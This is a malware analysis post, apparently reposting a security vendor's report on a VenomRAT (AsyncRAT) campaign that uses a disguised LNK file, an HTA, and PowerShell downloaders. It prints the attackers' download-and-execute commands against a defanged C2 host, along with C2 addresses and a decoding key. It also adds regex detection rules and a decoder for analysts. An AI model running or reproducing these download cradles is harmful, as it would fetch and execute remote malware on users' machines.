Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies

by Prapattimynk, Wednesday, 24 January 2024
AhnLab SEcurity intelligence Center (ASEC) found a shortcut file (.lnk) that downloads AsyncRAT (VenomRAT). In order for the LNK file to disguise itself as a legitimate Word file, it was distributed with the name ‘Survey.docx.lnk’ inside a compressed file which also contained a legitimate text file. Above all, users need to remain vigilant, as the executable file (blues.exe) used in the attack is disguised as a Korean company’s certificate.

The overall operation process of the malware is as shown below.

Figure 1. Operation process

The compressed file is disguised as a ‘survey’ to encourage users to open it. It includes a text file and the malicious LNK file. The text file contains instructions that guide users to execute the malicious LNK file.

Figure 2. Inside the readme.txt file

The LNK file contains a malicious command: when it is executed, it launches mshta to fetch and run additional script code from an external URL.

Figure 3. LNK properties
  • Execution command
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* 'hxxp://194.33.191[.]248:7287/docx1.hta'

hxxp://194.33.191[.]248:7287/docx1.hta has obfuscated strings inside. When they are decoded, a PowerShell command can be seen. As shown in Figure 5, this command downloads additional files and saves them in the %appdata% folder before executing them.

  • Download URL
Figure 4. Part of the script code inside docx1.hta
Figure 5. Part of the decoded docx1.hta code

The downloaded qfqe.docx file is a legitimate Word document that contains survey information, which makes it hard for users to notice any malicious activities.

Figure 6. Inside qfqe.docx

The blues.exe file that is downloaded with the Word file is a downloader-type malware disguised as a Korean IT company’s certificate. When executed, it downloads additional scripts through PowerShell.

Figure 7. Signature information of blues.exe
Figure 8. Part of the blues.exe code
  • Execution command
    powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex

The sys.ps1 executed through the blues.exe file shown above is also a downloader-type malware that downloads additional data from hxxp://194.33.191[.]248:7287/adb.dll and executes it in a fileless format.

Figure 9. sys.ps1 code
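The two PowerShell commands quoted in this report (the LNK's wildcard `$env:` path that resolves to mshta and fetches a remote .hta, and the `iwr ... | iex` cradle launched by blues.exe) are the kind of process-creation events a detection rule can flag. The following is an added example written for this page, not code from ASEC; the events are constructed to mirror the quoted command lines, with the C2 host kept in the report's defanged form and refanged before matching.

```python
import re

# Constructed process-creation events modelled on the commands quoted in this report.
# They are not real telemetry; the C2 host is written defanged exactly as the report prints it.
SAMPLE_EVENTS = [
    {   # LNK -> PowerShell, wildcard path that resolves to mshta, remote .hta (Figure 3)
        "parent": "explorer.exe", "image": "powershell.exe",
        "cmdline": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . "
                   r"$env:C:\W*\S*2\m*h?a.* 'hxxp://194.33.191[.]248:7287/docx1.hta'",
    },
    {   # blues.exe -> PowerShell download cradle (Figure 8)
        "parent": "blues.exe", "image": "powershell.exe",
        "cmdline": "powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex",
    },
    {   # benign: scheduled maintenance script (constructed)
        "parent": "svchost.exe", "image": "powershell.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # benign: locally installed HTA launched by a vendor installer (constructed)
        "parent": "setup.exe", "image": "mshta.exe",
        "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta",
    },
]

REPORT_C2_HOSTS = ["194.33.191[.]248"]   # defanged IOC as printed in the report


def refang(s: str) -> str:
    """Turn the report's defanged notation back into a matchable string."""
    return s.replace("[.]", ".").replace("hxxp", "http")


RULES = [
    # PowerShell resolving an executable through an $env:/wildcard path hides the real image name
    ("wildcard_path_exec", re.compile(r"\$env:[^\s'\"]*[*?]", re.I)),
    # an .hta fetched over HTTP(S) rather than opened from disk
    ("remote_hta", re.compile(r"https?://\S+?\.hta\b", re.I)),
    # download-and-execute cradle: web fetch piped or fed into Invoke-Expression
    ("download_cradle", re.compile(
        r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b.*\b(iex|invoke-expression)\b",
        re.I | re.S)),
]


def classify(event: dict) -> list[str]:
    """Return the names of every rule the event's command line triggers."""
    cmd = refang(event["cmdline"])
    hits = [name for name, rx in RULES if rx.search(cmd)]
    if any(refang(h) in cmd for h in REPORT_C2_HOSTS):
        hits.append("known_c2_host")
    return hits


def scan(events) -> dict[int, list[str]]:
    """Map the index of each flagged event to its rule hits; clean events are omitted."""
    flagged = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            flagged[i] = hits
    return flagged


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["parent"], "->", hits)
```

The wildcard rule is the one worth keeping even after the indicators in this report age out: a legitimate script has no reason to dot-source `$env:C:\W*\S*2\m*h?a.*`, and matching on the wildcard construct catches the mshta launch without ever seeing the string "mshta" on the command line.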

adb.dll contains an encoded shellcode, which is recovered by Base64-decoding the data and XORing the result with the string ‘sorootktools’.

Figure 10. Encoded shellcode included in the adb.dll
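An analyst recovering the blob from adb.dll needs exactly the two steps the paragraph names: Base64 decoding, then a repeating-key XOR with ‘sorootktools’. The decoder below is an added example written for this page, not ASEC's tooling. It assumes Base64 decoding happens before the XOR (the usual order for this construction) and works on a constructed strings dump containing a harmless marker, not bytes from the real sample.

```python
import base64
import re
from itertools import cycle

KEY = b"sorootktools"   # XOR key named in the report


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """XOR data against a repeating key; the operation is its own inverse."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_payload(b64_text: str, key: bytes = KEY) -> bytes:
    """Base64-decode the blob, then XOR it with the key (assumed order: Base64 first)."""
    return xor_with_key(base64.b64decode(b64_text), key)


def encode_payload(data: bytes, key: bytes = KEY) -> str:
    """Inverse of decode_payload; used here only to build the constructed sample."""
    return base64.b64encode(xor_with_key(data, key)).decode("ascii")


def extract_b64_blobs(text: str, min_len: int = 64) -> list[str]:
    """Pull every Base64 run of at least min_len characters (plus padding) out of a dump."""
    rx = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    return rx.findall(text)


def decode_dump(text: str, key: bytes = KEY, min_len: int = 32) -> list[bytes]:
    """Decode each long Base64 run found in a strings dump with the given key."""
    return [decode_payload(blob, key) for blob in extract_b64_blobs(text, min_len)]


# Constructed sample: harmless marker text standing in for the real blob
SAMPLE_PLAINTEXT = b"constructed sample: not bytes from adb.dll"
SAMPLE_DUMP = (
    "adb.dll strings (constructed)\n"
    "key=sorootktools\n"
    "data=" + encode_payload(SAMPLE_PLAINTEXT) + "\n"
    "end\n"
)

if __name__ == "__main__":
    for blob in decode_dump(SAMPLE_DUMP):
        print(blob)
```

Run against a real strings dump, `decode_dump` returns raw bytes; whether a decoded run is the shellcode or just an unrelated Base64 string is decided by inspecting the output (for example, in a disassembler), so keep `min_len` low enough to avoid missing a blob split across lines.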

The shellcode that is ultimately executed is the RAT-type malware VenomRAT (AsyncRAT), which performs keylogging and exfiltrates information about the user's PC. It can also carry out various other malicious behaviors on commands received from the threat actor.

  • C2 : 194.33.191[.]248:4449
Figure 11. Part of the VenomRAT (AsyncRAT) code

Malicious shortcut files disguised as legitimate documents are continuously being distributed. Users can mistake the shortcut file for a normal document, as the ‘.lnk’ extension is not visible on the names of the files. Therefore, particular caution is advised.

[File Detection]
Trojan/LNK.Runner (2024.01.16.00)
Trojan/HTML.Agent.SC196238 (2024.01.17.00)
Trojan/Win.Generic.C5572807 (2024.01.12.03)
Trojan/PowerShell.Agent (2024.01.17.00)
Trojan/Win.Generic.C5337844 (2022.12.21.00)

[Behavior Detection]

[IOC Info]